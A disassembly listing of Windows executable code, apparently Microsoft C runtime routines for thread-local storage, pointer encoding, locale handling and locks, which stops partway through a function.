; =============== S U B R O U T I N E =======================================
sub_404E21 proc near ; CODE XREF: sub_405073+31�p
; sub_4053B5+E8�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
mov eax, [esi+0BCh]
xor ebp, ebp
cmp eax, ebp
push edi
jz short loc_404EA4
cmp eax, offset off_423F38
jz short loc_404EA4
mov eax, [esi+0B0h]
cmp eax, ebp
jz short loc_404EA4
cmp [eax], ebp
jnz short loc_404EA4
mov eax, [esi+0B8h]
cmp eax, ebp
jz short loc_404E6B
cmp [eax], ebp
jnz short loc_404E6B
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C704
pop ecx
pop ecx
loc_404E6B: ; CODE XREF: sub_404E21+31�j
; sub_404E21+35�j
mov eax, [esi+0B4h]
cmp eax, ebp
jz short loc_404E8C
cmp [eax], ebp
jnz short loc_404E8C
push eax
call sub_403603
push dword ptr [esi+0BCh]
call sub_40C6C4
pop ecx
pop ecx
loc_404E8C: ; CODE XREF: sub_404E21+52�j
; sub_404E21+56�j
push dword ptr [esi+0B0h]
call sub_403603
push dword ptr [esi+0BCh]
call sub_403603
pop ecx
pop ecx
loc_404EA4: ; CODE XREF: sub_404E21+12�j
; sub_404E21+19�j ...
mov eax, [esi+0C0h]
cmp eax, ebp
jz short loc_404EF2
cmp [eax], ebp
jnz short loc_404EF2
mov eax, [esi+0C4h]
sub eax, 0FEh
push eax
call sub_403603
mov eax, [esi+0CCh]
mov edi, 80h
sub eax, edi
push eax
call sub_403603
mov eax, [esi+0D0h]
sub eax, edi
push eax
call sub_403603
push dword ptr [esi+0C0h]
call sub_403603
add esp, 10h
loc_404EF2: ; CODE XREF: sub_404E21+8B�j
; sub_404E21+8F�j
lea edi, [esi+0D4h]
mov eax, [edi]
cmp eax, offset off_423E78
jz short loc_404F18
cmp [eax+0B4h], ebp
jnz short loc_404F18
push eax
call sub_40C534
push dword ptr [edi]
call sub_403603
pop ecx
pop ecx
loc_404F18: ; CODE XREF: sub_404E21+DE�j
; sub_404E21+E6�j
push 6
lea edi, [esi+50h]
pop ebx
loc_404F1E: ; CODE XREF: sub_404E21+132�j
cmp dword ptr [edi-8], offset dword_423598
jz short loc_404F38
mov eax, [edi]
cmp eax, ebp
jz short loc_404F38
cmp [eax], ebp
jnz short loc_404F38
push eax
call sub_403603
pop ecx
loc_404F38: ; CODE XREF: sub_404E21+104�j
; sub_404E21+10A�j ...
cmp [edi-4], ebp
jz short loc_404F4F
mov eax, [edi+4]
cmp eax, ebp
jz short loc_404F4F
cmp [eax], ebp
jnz short loc_404F4F
push eax
call sub_403603
pop ecx
loc_404F4F: ; CODE XREF: sub_404E21+11A�j
; sub_404E21+121�j ...
add edi, 10h
dec ebx
jnz short loc_404F1E
push esi
call sub_403603
pop ecx
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404E21 endp
; =============== S U B R O U T I N E =======================================
sub_404F61 proc near ; CODE XREF: sub_405073+12�p
; sub_405266+93�p
arg_0 = dword ptr 4
push ebx
push ebp
push esi
mov esi, [esp+0Ch+arg_0]
push edi
mov edi, ds:dword_41D1B8
push esi
call edi
mov eax, [esi+0B0h]
test eax, eax
jz short loc_404F7F
push eax
call edi
loc_404F7F: ; CODE XREF: sub_404F61+19�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_404F8C
push eax
call edi
loc_404F8C: ; CODE XREF: sub_404F61+26�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_404F99
push eax
call edi
loc_404F99: ; CODE XREF: sub_404F61+33�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_404FA6
push eax
call edi
loc_404FA6: ; CODE XREF: sub_404F61+40�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_404FAC: ; CODE XREF: sub_404F61+71�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_404FBE
mov eax, [ebx]
test eax, eax
jz short loc_404FBE
push eax
call edi
loc_404FBE: ; CODE XREF: sub_404F61+52�j
; sub_404F61+58�j
cmp dword ptr [ebx-4], 0
jz short loc_404FCE
mov eax, [ebx+4]
test eax, eax
jz short loc_404FCE
push eax
call edi
loc_404FCE: ; CODE XREF: sub_404F61+61�j
; sub_404F61+68�j
add ebx, 10h
dec ebp
jnz short loc_404FAC
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi
pop edi
pop esi
pop ebp
pop ebx
retn
sub_404F61 endp
; =============== S U B R O U T I N E =======================================
sub_404FE7 proc near ; CODE XREF: sub_405073+1D�p
; sub_4053B5+CC�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_40506F
push ebx
push ebp
push edi
mov edi, ds:dword_41D1BC
push esi
call edi
mov eax, [esi+0B0h]
test eax, eax
jz short loc_405009
push eax
call edi
loc_405009: ; CODE XREF: sub_404FE7+1D�j
mov eax, [esi+0B8h]
test eax, eax
jz short loc_405016
push eax
call edi
loc_405016: ; CODE XREF: sub_404FE7+2A�j
mov eax, [esi+0B4h]
test eax, eax
jz short loc_405023
push eax
call edi
loc_405023: ; CODE XREF: sub_404FE7+37�j
mov eax, [esi+0C0h]
test eax, eax
jz short loc_405030
push eax
call edi
loc_405030: ; CODE XREF: sub_404FE7+44�j
push 6
lea ebx, [esi+50h]
pop ebp
loc_405036: ; CODE XREF: sub_404FE7+75�j
cmp dword ptr [ebx-8], offset dword_423598
jz short loc_405048
mov eax, [ebx]
test eax, eax
jz short loc_405048
push eax
call edi
loc_405048: ; CODE XREF: sub_404FE7+56�j
; sub_404FE7+5C�j
cmp dword ptr [ebx-4], 0
jz short loc_405058
mov eax, [ebx+4]
test eax, eax
jz short loc_405058
push eax
call edi
loc_405058: ; CODE XREF: sub_404FE7+65�j
; sub_404FE7+6C�j
add ebx, 10h
dec ebp
jnz short loc_405036
mov eax, [esi+0D4h]
add eax, 0B4h
push eax
call edi
pop edi
pop ebp
pop ebx
loc_40506F: ; CODE XREF: sub_404FE7+7�j
mov eax, esi
pop esi
retn
sub_404FE7 endp
; =============== S U B R O U T I N E =======================================
sub_405073 proc near ; CODE XREF: sub_4050B1+54�p
test edi, edi
jz short loc_4050AE
test eax, eax
jz short loc_4050AE
push esi
mov esi, [eax]
cmp esi, edi
jz short loc_4050AA
push edi
mov [eax], edi
call sub_404F61
test esi, esi
pop ecx
jz short loc_4050AA
push esi
call sub_404FE7
cmp dword ptr [esi], 0
pop ecx
jnz short loc_4050AA
cmp esi, offset dword_4235A0
jz short loc_4050AA
push esi
call sub_404E21
pop ecx
loc_4050AA: ; CODE XREF: sub_405073+D�j
; sub_405073+1A�j ...
mov eax, edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4050AE: ; CODE XREF: sub_405073+2�j
; sub_405073+6�j
xor eax, eax
retn
sub_405073 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4050B1 proc near ; CODE XREF: sub_40271F+37�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 0Ch
push offset dword_421470
call __SEH_prolog4
call sub_40539D
mov esi, eax
mov eax, ds:dword_423594
test [esi+70h], eax
jz short loc_4050F0
cmp dword ptr [esi+6Ch], 0
jz short loc_4050F0
call sub_40539D
mov esi, [eax+6Ch]
loc_4050DC: ; CODE XREF: sub_4050B1+68�j
test esi, esi
jnz short loc_4050E8
push 20h
call sub_40785D
pop ecx
loc_4050E8: ; CODE XREF: sub_4050B1+2D�j
mov eax, esi
call __SEH_epilog4
retn
; ---------------------------------------------------------------------------
loc_4050F0: ; CODE XREF: sub_4050B1+1B�j
; sub_4050B1+21�j
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
lea eax, [esi+6Ch]
mov edi, ds:off_423678
call sub_405073
mov [ebp+var_1C], eax
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_40511B
jmp short loc_4050DC
sub_4050B1 endp
; =============== S U B R O U T I N E =======================================
sub_40511B proc near ; CODE XREF: sub_4050B1+63�p
; DATA XREF: seg001:00421488�o
push 0Ch
call sub_40591F
pop ecx
mov esi, [ebp-1Ch]
retn
sub_40511B endp
; =============== S U B R O U T I N E =======================================
sub_405127 proc near ; CODE XREF: sub_402D09+81�p
; sub_402D09+96�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_42368C
mov esi, ds:dword_41D184
call esi
test eax, eax
jz short loc_40515B
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_40515B
push eax
push ds:dword_42368C
call esi
call eax
test eax, eax
jz short loc_40515B
mov eax, [eax+1F8h]
jmp short loc_405176
; ---------------------------------------------------------------------------
loc_40515B: ; CODE XREF: sub_405127+11�j
; sub_405127+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
test eax, eax
jz short loc_405184
push offset aEncodepointer ; "EncodePointer"
push eax
call ds:dword_41D0EC
loc_405176: ; CODE XREF: sub_405127+32�j
test eax, eax
jz short loc_405184
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_405184: ; CODE XREF: sub_405127+41�j
; sub_405127+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405127 endp
; =============== S U B R O U T I N E =======================================
sub_40518A proc near ; CODE XREF: sub_407B19+1�p
; sub_40B915+2F�p ...
push 0
call sub_405127
pop ecx
retn
sub_40518A endp
; =============== S U B R O U T I N E =======================================
sub_405193 proc near ; CODE XREF: sub_402D09+B�p
; sub_402D09+1C�p ...
arg_0 = dword ptr 4
push esi
push ds:dword_42368C
mov esi, ds:dword_41D184
call esi
test eax, eax
jz short loc_4051C7
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_4051C7
push eax
push ds:dword_42368C
call esi
call eax
test eax, eax
jz short loc_4051C7
mov eax, [eax+1FCh]
jmp short loc_4051E2
; ---------------------------------------------------------------------------
loc_4051C7: ; CODE XREF: sub_405193+11�j
; sub_405193+1B�j ...
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
test eax, eax
jz short loc_4051F0
push offset aDecodepointer ; "DecodePointer"
push eax
call ds:dword_41D0EC
loc_4051E2: ; CODE XREF: sub_405193+32�j
test eax, eax
jz short loc_4051F0
push [esp+4+arg_0]
call eax
mov [esp+4+arg_0], eax
loc_4051F0: ; CODE XREF: sub_405193+41�j
; sub_405193+51�j
mov eax, [esp+4+arg_0]
pop esi
retn
sub_405193 endp
; =============== S U B R O U T I N E =======================================
sub_4051F6 proc near ; DATA XREF: sub_4054D6+8A�o
call ds:dword_41D180
retn 4
sub_4051F6 endp
; =============== S U B R O U T I N E =======================================
sub_4051FF proc near ; CODE XREF: sub_40531A+A�p
push ds:dword_42368C
call ds:dword_41D184
test eax, eax
jnz short locret_405228
push ds:dword_425E08
call sub_405193
pop ecx
push eax
push ds:dword_42368C
call ds:dword_41D17C
locret_405228: ; CODE XREF: sub_4051FF+E�j
retn
sub_4051FF endp
; =============== S U B R O U T I N E =======================================
sub_405229 proc near ; CODE XREF: sub_4054D6+12�p
; sub_4054D6:loc_405650�p
mov eax, ds:dword_423688
cmp eax, 0FFFFFFFFh
jz short loc_405249
push eax
push ds:dword_425E10
call sub_405193
pop ecx
call eax
or ds:dword_423688, 0FFFFFFFFh
loc_405249: ; CODE XREF: sub_405229+8�j
mov eax, ds:dword_42368C
cmp eax, 0FFFFFFFFh
jz short loc_405261
push eax
call ds:dword_41D178
or ds:dword_42368C, 0FFFFFFFFh
loc_405261: ; CODE XREF: sub_405229+28�j
jmp sub_4058CA
sub_405229 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405266 proc near ; CODE XREF: sub_40531A+59�p
; sub_4054D6+162�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 0Ch
push offset dword_421490
call __SEH_prolog4
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
mov [ebp+var_1C], eax
mov esi, [ebp+arg_0]
mov dword ptr [esi+5Ch], offset dword_423DC0
xor edi, edi
inc edi
mov [esi+14h], edi
test eax, eax
jz short loc_4052B8
push offset aEncodepointer ; "EncodePointer"
push eax
mov ebx, ds:dword_41D0EC
call ebx
mov [esi+1F8h], eax
push offset aDecodepointer ; "DecodePointer"
push [ebp+var_1C]
call ebx
mov [esi+1FCh], eax
loc_4052B8: ; CODE XREF: sub_405266+2C�j
mov [esi+70h], edi
mov byte ptr [esi+0C8h], 43h
mov byte ptr [esi+14Bh], 43h
mov eax, offset dword_423070
mov [esi+68h], eax
push eax
call ds:dword_41D1B8
push 0Ch
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [ebp+arg_4]
mov [esi+6Ch], eax
test eax, eax
jnz short loc_4052F6
mov eax, ds:off_423678
mov [esi+6Ch], eax
loc_4052F6: ; CODE XREF: sub_405266+86�j
push dword ptr [esi+6Ch]
call sub_404F61
pop ecx
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_405311
call __SEH_epilog4
retn
sub_405266 endp
; =============== S U B R O U T I N E =======================================
sub_405311 proc near ; CODE XREF: sub_405266+A0�p
; DATA XREF: seg001:004214A8�o
push 0Ch
call sub_40591F
pop ecx
retn
sub_405311 endp
; =============== S U B R O U T I N E =======================================
sub_40531A proc near ; CODE XREF: sub_40539D+1�p sub_4057D3�p ...
push esi
push edi
call ds:dword_41D0F0
mov edi, eax
call sub_4051FF
push ds:dword_423688
push ds:dword_42368C
call ds:dword_41D184
call eax
mov esi, eax
test esi, esi
jnz short loc_405391
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405391
push esi
push ds:dword_423688
push ds:dword_425E0C
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_405388
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
jmp short loc_405391
; ---------------------------------------------------------------------------
loc_405388: ; CODE XREF: sub_40531A+54�j
push esi
call sub_403603
pop ecx
xor esi, esi
loc_405391: ; CODE XREF: sub_40531A+27�j
; sub_40531A+3B�j ...
push edi
call ds:dword_41D174
pop edi
mov eax, esi
pop esi
retn
sub_40531A endp
; =============== S U B R O U T I N E =======================================
sub_40539D proc near ; CODE XREF: sub_40271F+F�p sub_403356�p ...
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_4053B1
push 10h
call sub_40785D
pop ecx
loc_4053B1: ; CODE XREF: sub_40539D+A�j
mov eax, esi
pop esi
retn
sub_40539D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4053B5 proc near ; DATA XREF: sub_4054D6+115�o
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 8
push offset dword_4214B0
call __SEH_prolog4
mov esi, [ebp+arg_0]
test esi, esi
jz loc_4054B6
mov eax, [esi+24h]
test eax, eax
jz short loc_4053DA
push eax
call sub_403603
pop ecx
loc_4053DA: ; CODE XREF: sub_4053B5+1C�j
mov eax, [esi+2Ch]
test eax, eax
jz short loc_4053E8
push eax
call sub_403603
pop ecx
loc_4053E8: ; CODE XREF: sub_4053B5+2A�j
mov eax, [esi+34h]
test eax, eax
jz short loc_4053F6
push eax
call sub_403603
pop ecx
loc_4053F6: ; CODE XREF: sub_4053B5+38�j
mov eax, [esi+3Ch]
test eax, eax
jz short loc_405404
push eax
call sub_403603
pop ecx
loc_405404: ; CODE XREF: sub_4053B5+46�j
mov eax, [esi+44h]
test eax, eax
jz short loc_405412
push eax
call sub_403603
pop ecx
loc_405412: ; CODE XREF: sub_4053B5+54�j
mov eax, [esi+48h]
test eax, eax
jz short loc_405420
push eax
call sub_403603
pop ecx
loc_405420: ; CODE XREF: sub_4053B5+62�j
mov eax, [esi+5Ch]
cmp eax, offset dword_423DC0
jz short loc_405431
push eax
call sub_403603
pop ecx
loc_405431: ; CODE XREF: sub_4053B5+73�j
push 0Dh
call sub_4059F7
pop ecx
and [ebp+ms_exc.disabled], 0
mov edi, [esi+68h]
test edi, edi
jz short loc_40545E
push edi
call ds:dword_41D1BC
test eax, eax
jnz short loc_40545E
cmp edi, offset dword_423070
jz short loc_40545E
push edi
call sub_403603
pop ecx
loc_40545E: ; CODE XREF: sub_4053B5+8D�j
; sub_4053B5+98�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054C1
push 0Ch
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], 1
mov edi, [esi+6Ch]
test edi, edi
jz short loc_4054A3
push edi
call sub_404FE7
pop ecx
cmp edi, ds:off_423678
jz short loc_4054A3
cmp edi, offset dword_4235A0
jz short loc_4054A3
cmp dword ptr [edi], 0
jnz short loc_4054A3
push edi
call sub_404E21
pop ecx
loc_4054A3: ; CODE XREF: sub_4053B5+C9�j
; sub_4053B5+D8�j ...
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4054CD
push esi
call sub_403603
pop ecx
loc_4054B6: ; CODE XREF: sub_4053B5+11�j
call __SEH_epilog4
retn 4
sub_4053B5 endp
; =============== S U B R O U T I N E =======================================
sub_4054BE proc near ; DATA XREF: seg001:004214C8�o
mov esi, [ebp+8]
sub_4054BE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054C1 proc near ; CODE XREF: sub_4053B5+B0�p
push 0Dh
call sub_40591F
pop ecx
retn
sub_4054C1 endp
; =============== S U B R O U T I N E =======================================
sub_4054CA proc near ; DATA XREF: seg001:004214D4�o
mov esi, [ebp+8]
sub_4054CA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4054CD proc near ; CODE XREF: sub_4053B5+F5�p
push 0Ch
call sub_40591F
pop ecx
retn
sub_4054CD endp
; =============== S U B R O U T I N E =======================================
sub_4054D6 proc near ; CODE XREF: seg000:loc_40401B�p
push edi
push offset aKernel32_dll ; "KERNEL32.DLL"
call ds:dword_41D0E4
mov edi, eax
test edi, edi
jnz short loc_4054F1
call sub_405229
xor eax, eax
pop edi
retn
; ---------------------------------------------------------------------------
loc_4054F1: ; CODE XREF: sub_4054D6+10�j
push esi
mov esi, ds:dword_41D0EC
push offset dword_41D4D4
push edi
call esi
push offset aFlsgetvalue ; "FlsGetValue"
push edi
mov ds:dword_425E04, eax
call esi
push offset aFlssetvalue ; "FlsSetValue"
push edi
mov ds:dword_425E08, eax
call esi
push offset aFlsfree ; "FlsFree"
push edi
mov ds:dword_425E0C, eax
call esi
cmp ds:dword_425E04, 0
mov esi, ds:dword_41D17C
mov ds:dword_425E10, eax
jz short loc_405551
cmp ds:dword_425E08, 0
jz short loc_405551
cmp ds:dword_425E0C, 0
jz short loc_405551
test eax, eax
jnz short loc_405575
loc_405551: ; CODE XREF: sub_4054D6+63�j
; sub_4054D6+6C�j ...
mov eax, ds:dword_41D184
mov ds:dword_425E08, eax
mov eax, ds:dword_41D178
mov ds:dword_425E04, offset sub_4051F6
mov ds:dword_425E0C, esi
mov ds:dword_425E10, eax
loc_405575: ; CODE XREF: sub_4054D6+79�j
call ds:dword_41D180
cmp eax, 0FFFFFFFFh
mov ds:dword_42368C, eax
jz loc_405655
push ds:dword_425E08
push eax
call esi
test eax, eax
jz loc_405655
call sub_407B19
push ds:dword_425E04
call sub_405127
push ds:dword_425E08
mov ds:dword_425E04, eax
call sub_405127
push ds:dword_425E0C
mov ds:dword_425E08, eax
call sub_405127
push ds:dword_425E10
mov ds:dword_425E0C, eax
call sub_405127
add esp, 10h
mov ds:dword_425E10, eax
call sub_405881
test eax, eax
jz short loc_405650
push offset sub_4053B5
push ds:dword_425E04
call sub_405193
pop ecx
call eax
cmp eax, 0FFFFFFFFh
mov ds:dword_423688, eax
jz short loc_405650
push 214h
push 1
call sub_40777A
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_405650
push esi
push ds:dword_423688
push ds:dword_425E0C
call sub_405193
pop ecx
call eax
test eax, eax
jz short loc_405650
push 0
push esi
call sub_405266
pop ecx
pop ecx
call ds:dword_41D0E0
or dword ptr [esi+4], 0FFFFFFFFh
mov [esi], eax
xor eax, eax
inc eax
jmp short loc_405657
; ---------------------------------------------------------------------------
loc_405650: ; CODE XREF: sub_4054D6+113�j
; sub_4054D6+130�j ...
call sub_405229
loc_405655: ; CODE XREF: sub_4054D6+AD�j
; sub_4054D6+BE�j
xor eax, eax
loc_405657: ; CODE XREF: sub_4054D6+178�j
pop esi
pop edi
retn
sub_4054D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40565A proc near ; CODE XREF: sub_4027D6+9B�p
; sub_4027D6+AD�p ...
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push [ebp+arg_4]
lea ecx, [ebp+var_18]
call sub_40271F
mov ebx, [ebp+arg_0]
mov esi, 100h
cmp ebx, esi
jnb short loc_4056CD
mov ecx, [ebp+var_18]
cmp dword ptr [ecx+0ACh], 1
jle short loc_405699
lea eax, [ebp+var_18]
push eax
push 1
push ebx
call sub_40CA44
mov ecx, [ebp+var_18]
add esp, 0Ch
jmp short loc_4056A6
; ---------------------------------------------------------------------------
loc_405699: ; CODE XREF: sub_40565A+29�j
mov eax, [ecx+0C8h]
movzx eax, byte ptr [eax+ebx*2]
and eax, 1
loc_4056A6: ; CODE XREF: sub_40565A+3D�j
test eax, eax
jz short loc_4056B9
mov eax, [ecx+0CCh]
movzx eax, byte ptr [eax+ebx]
jmp loc_405760
; ---------------------------------------------------------------------------
loc_4056B9: ; CODE XREF: sub_40565A+4E�j
; sub_40565A+EA�j
cmp [ebp+var_C], 0
jz short loc_4056C6
mov eax, [ebp+var_10]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_4056C6: ; CODE XREF: sub_40565A+63�j
mov eax, ebx
jmp loc_40576D
; ---------------------------------------------------------------------------
loc_4056CD: ; CODE XREF: sub_40565A+1D�j
mov eax, [ebp+var_18]
cmp dword ptr [eax+0ACh], 1
jle short loc_40570A
mov [ebp+arg_0], ebx
sar [ebp+arg_0], 8
lea eax, [ebp+var_18]
push eax
mov eax, [ebp+arg_0]
and eax, 0FFh
push eax
call sub_40CA00
test eax, eax
pop ecx
pop ecx
jz short loc_40570A
mov al, byte ptr [ebp+arg_0]
push 2
mov [ebp+var_4], al
mov [ebp+var_3], bl
mov [ebp+var_2], 0
pop ecx
jmp short loc_40571F
; ---------------------------------------------------------------------------
loc_40570A: ; CODE XREF: sub_40565A+7D�j
; sub_40565A+9C�j
call sub_4057D3
mov dword ptr [eax], 2Ah
xor ecx, ecx
mov [ebp+var_4], bl
mov [ebp+var_3], 0
inc ecx
loc_40571F: ; CODE XREF: sub_40565A+AE�j
mov eax, [ebp+var_18]
push 1
push dword ptr [eax+4]
lea edx, [ebp+var_8]
push 3
push edx
push ecx
lea ecx, [ebp+var_4]
push ecx
push esi
push dword ptr [eax+14h]
lea eax, [ebp+var_18]
push eax
call sub_40C2F9
add esp, 24h
test eax, eax
jz loc_4056B9
cmp eax, 1
jnz short loc_405755
movzx eax, [ebp+var_8]
jmp short loc_405760
; ---------------------------------------------------------------------------
loc_405755: ; CODE XREF: sub_40565A+F3�j
movzx ecx, [ebp+var_7]
xor eax, eax
mov ah, [ebp+var_8]
or eax, ecx
loc_405760: ; CODE XREF: sub_40565A+5A�j
; sub_40565A+F9�j
cmp [ebp+var_C], 0
jz short loc_40576D
mov ecx, [ebp+var_10]
and dword ptr [ecx+70h], 0FFFFFFFDh
loc_40576D: ; CODE XREF: sub_40565A+6E�j
; sub_40565A+10A�j
pop esi
pop ebx
leave
retn
sub_40565A endp
; =============== S U B R O U T I N E =======================================
sub_405771 proc near ; CODE XREF: sub_4108BD+19�p
; sub_4108BD+36�p
arg_0 = dword ptr 4
cmp ds:dword_425DE0, 0
jnz short loc_40578A
mov eax, [esp+arg_0]
lea ecx, [eax-41h]
cmp ecx, 19h
ja short locret_405797
add eax, 20h
retn
; ---------------------------------------------------------------------------
loc_40578A: ; CODE XREF: sub_405771+7�j
push 0
push [esp+4+arg_0]
call sub_40565A
pop ecx
pop ecx
locret_405797: ; CODE XREF: sub_405771+13�j
retn
sub_405771 endp
; =============== S U B R O U T I N E =======================================
sub_405798 proc near ; CODE XREF: sub_403603+80�p
; sub_4057F9+D�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
xor ecx, ecx
loc_40579E: ; CODE XREF: sub_405798+13�j
cmp eax, ds:dword_423690[ecx*8]
jz short loc_4057B9
inc ecx
cmp ecx, 2Dh
jl short loc_40579E
lea ecx, [eax-13h]
cmp ecx, 11h
ja short loc_4057C1
push 0Dh
pop eax
retn
; ---------------------------------------------------------------------------
loc_4057B9: ; CODE XREF: sub_405798+D�j
mov eax, ds:dword_423694[ecx*8]
retn
; ---------------------------------------------------------------------------
loc_4057C1: ; CODE XREF: sub_405798+1B�j
add eax, 0FFFFFF44h
push 0Eh
pop ecx
cmp ecx, eax
sbb eax, eax
and eax, ecx
add eax, 8
retn
sub_405798 endp
; =============== S U B R O U T I N E =======================================
sub_4057D3 proc near ; CODE XREF: sub_4027D6+19�p
; sub_4027D6+4F�p ...
call sub_40531A
test eax, eax
jnz short loc_4057E2
mov eax, offset dword_4237F8
retn
; ---------------------------------------------------------------------------
loc_4057E2: ; CODE XREF: sub_4057D3+7�j
add eax, 8
retn
sub_4057D3 endp
; =============== S U B R O U T I N E =======================================
sub_4057E6 proc near ; CODE XREF: sub_4057F9+1�p
; sub_408AE1+14�p ...
call sub_40531A
test eax, eax
jnz short loc_4057F5
mov eax, offset dword_4237FC
retn
; ---------------------------------------------------------------------------
loc_4057F5: ; CODE XREF: sub_4057E6+7�j
add eax, 0Ch
retn
sub_4057E6 endp
; =============== S U B R O U T I N E =======================================
sub_4057F9 proc near ; CODE XREF: sub_408A4D+84�p
; sub_409DAD+3FB�p ...
arg_0 = dword ptr 4
push esi
call sub_4057E6
mov ecx, [esp+4+arg_0]
push ecx
mov [eax], ecx
call sub_405798
pop ecx
mov esi, eax
call sub_4057D3
mov [eax], esi
pop esi
retn
sub_4057F9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405820 proc near ; CODE XREF: sub_4028F9+9A�p
; sub_4029E9+42�j
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
or ecx, ecx
jz short loc_40587A
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_40583C: ; CODE XREF: sub_405820+49�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_40586B
or al, al
jz short loc_40586B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_405858
cmp ah, bl
ja short loc_405858
add ah, dh
loc_405858: ; CODE XREF: sub_405820+30�j
; sub_405820+34�j
cmp al, bh
jb short loc_405862
cmp al, bl
ja short loc_405862
add al, dh
loc_405862: ; CODE XREF: sub_405820+3A�j
; sub_405820+3E�j
cmp ah, al
jnz short loc_405871
sub ecx, 1
jnz short loc_40583C
loc_40586B: ; CODE XREF: sub_405820+22�j
; sub_405820+26�j
xor ecx, ecx
cmp ah, al
jz short loc_40587A
loc_405871: ; CODE XREF: sub_405820+44�j
mov ecx, 0FFFFFFFFh
jb short loc_40587A
neg ecx
loc_40587A: ; CODE XREF: sub_405820+B�j
; sub_405820+4F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_405820 endp
; =============== S U B R O U T I N E =======================================
sub_405881 proc near ; CODE XREF: sub_4054D6+10C�p
push esi
push edi
xor esi, esi
mov edi, offset dword_425E18
loc_40588A: ; CODE XREF: sub_405881+35�j
cmp ds:dword_423804[esi*8], 1
jnz short loc_4058B2
lea eax, ds:423800h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_40CB14
test eax, eax
pop ecx
pop ecx
jz short loc_4058BE
loc_4058B2: ; CODE XREF: sub_405881+11�j
inc esi
cmp esi, 24h
jl short loc_40588A
xor eax, eax
inc eax
loc_4058BB: ; CODE XREF: sub_405881+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4058BE: ; CODE XREF: sub_405881+2F�j
and ds:dword_423800[esi*8], 0
xor eax, eax
jmp short loc_4058BB
sub_405881 endp
; =============== S U B R O U T I N E =======================================
sub_4058CA proc near ; CODE XREF: sub_405229:loc_405261�j
push ebx
mov ebx, ds:dword_41D170
push esi
mov esi, offset dword_423800
push edi
loc_4058D8: ; CODE XREF: sub_4058CA+30�j
mov edi, [esi]
test edi, edi
jz short loc_4058F1
cmp dword ptr [esi+4], 1
jz short loc_4058F1
push edi
call ebx
push edi
call sub_403603
and dword ptr [esi], 0
pop ecx
loc_4058F1: ; CODE XREF: sub_4058CA+12�j
; sub_4058CA+18�j
add esi, 8
cmp esi, offset dword_423920
jl short loc_4058D8
mov esi, offset dword_423800
pop edi
loc_405902: ; CODE XREF: sub_4058CA+50�j
mov eax, [esi]
test eax, eax
jz short loc_405911
cmp dword ptr [esi+4], 1
jnz short loc_405911
push eax
call ebx
loc_405911: ; CODE XREF: sub_4058CA+3C�j
; sub_4058CA+42�j
add esi, 8
